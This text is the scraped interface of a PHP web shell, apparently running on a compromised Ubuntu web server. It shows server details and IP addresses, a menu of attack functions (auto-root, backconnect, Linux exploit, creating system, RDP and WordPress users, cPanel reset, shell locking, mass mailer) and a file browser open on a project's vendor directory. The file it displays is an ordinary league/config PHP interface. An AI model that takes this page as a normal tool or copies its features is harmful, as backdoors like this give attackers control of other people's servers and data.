Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.111.34
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
source /
vendor /
league /
config /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Exception
[ DIR ]
drwxr-xr-x
Configuration.php
6.33
KB
-rw-r--r--
ConfigurationAwareInterface.ph...
516
B
-rw-r--r--
ConfigurationBuilderInterface....
498
B
-rw-r--r--
ConfigurationInterface.php
1.15
KB
-rw-r--r--
ConfigurationProviderInterface...
485
B
-rw-r--r--
MutableConfigurationInterface....
818
B
-rw-r--r--
ReadOnlyConfiguration.php
802
B
-rw-r--r--
SchemaBuilderInterface.php
586
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MutableConfigurationInterface.php
<?php declare(strict_types=1); /* * This file is part of the league/config package. * * (c) Colin O'Dell <colinodell@gmail.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace League\Config; use League\Config\Exception\UnknownOptionException; /** * Interface for setting/merging user-defined configuration values into the configuration object */ interface MutableConfigurationInterface { /** * @param mixed $value * * @throws UnknownOptionException if $key contains a nested path which doesn't point to an array value */ public function set(string $key, $value): void; /** * @param array<string, mixed> $config */ public function merge(array $config = []): void; }
Close